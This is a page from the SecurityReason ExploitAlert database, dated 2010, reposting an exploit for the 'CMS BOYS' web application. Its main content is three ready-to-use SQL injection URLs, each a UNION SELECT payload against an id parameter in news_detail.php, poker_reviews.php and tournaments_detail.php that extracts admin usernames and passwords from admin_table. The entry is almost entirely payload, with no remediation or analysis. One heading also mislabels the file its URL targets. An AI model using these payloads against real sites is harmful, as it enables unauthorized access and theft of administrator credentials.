|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  ExploitAlert Database |
||
ExploitAlert : 7755 Credit : MizoZ Date : 02.02.2010 Exploit Code : /* Name : CMS BOYS (id) Multiple SQL Injection WebSite : http://www.cmsboys.com/ Demo : http://www.cmsboys.com/democms/ Author : Hamza 'MizoZ' N. Email : mizozx@gmail.com Greetz : Zuka , PR0f.SELLIM , Dyle , Achille Dark3r , geeksec.com */ # 1st : File : news_detail.php , GET : id [HOST]/[PATH]/news_detail.php?id=[INJECTION] Exploit : [HOST]/[PATH]/news_detail.php?id=-15+union+select+1,2,3,4,concat(admin_user name,0x3a,admin_password) +from+admin_table-- # 2nd : File : news_detail.php , GET : id [HOST]/[PATH]/poker_reviews.php?id=[INJECTION] Exploit : [HOST]/[PATH]/poker_reviews.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,con cat (admin_username,0x3a,admin_password),12,13+from+admin_table-- # 3th : File : tournaments_detail.php , GET : id [HOST]/[PATH]/tournaments_detail.php?id=[INJECTION] Exploit : [HOST]/[PATH]/tournaments_detail.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,c oncat (admin_username,0x3a,admin_password)+from+admin_table--  Feedback : If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com. |
||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |